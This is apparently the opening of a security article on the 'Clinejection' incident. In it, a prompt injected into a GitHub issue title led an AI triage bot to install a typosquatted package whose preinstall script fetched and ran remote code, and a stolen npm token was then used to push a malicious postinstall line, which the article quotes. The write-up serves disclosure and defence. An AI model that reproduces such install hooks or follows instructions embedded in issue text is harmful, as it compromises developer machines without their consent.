esc to close Five steps from a GitHub issue title to 4,000 compromised developer machines. The entry point was natural language.
On February 17, 2026, someone published [email protected] to npm. The CLI binary was byte-identical to the previous version. The only change was one line in package.json :
"postinstall": "npm install -g openclaw@latest"
For the next eight hours, every developer who installed or updated Cline got OpenClaw - a separate AI agent with full system access - installed globally on their machine without consent. Approximately 4,000 downloads occurred before the package was pulled1.
The interesting part is not the payload. It is how the attacker got the npm token in the first place: by injecting a prompt into a GitHub issue title, which an AI triage bot read, interpreted as an instruction, and executed.
The full chain
The attack - which Snyk named "Clinejection"2 - composes five well-understood vulnerabilities into a single exploit that requires nothing more than opening a GitHub issue.
Step 1: Prompt injection via issue title. Cline had deployed an AI-powered issue triage workflow using Anthropic's claude-code-action . The workflow was configured with allowed_non_write_users: "*" , meaning any GitHub user could trigger it by opening an issue. The issue title was interpolated directly into Claude's prompt via ${{ github.event.issue.title }} without sanitisation.
On January 28, an attacker created Issue #8904 with a title crafted to look like a performance report but containing an embedded instruction: install a package from a specific GitHub repository3.
Step 2: The AI bot executes arbitrary code. Claude interpreted the injected instruction as legitimate and ran npm install pointing to the attacker's fork - a typosquatted repository ( glthub-actions/cline , note the missing 'i' in 'github'). The fork's package.json contained a preinstall script that fetched and executed a remote shell script.
... continue reading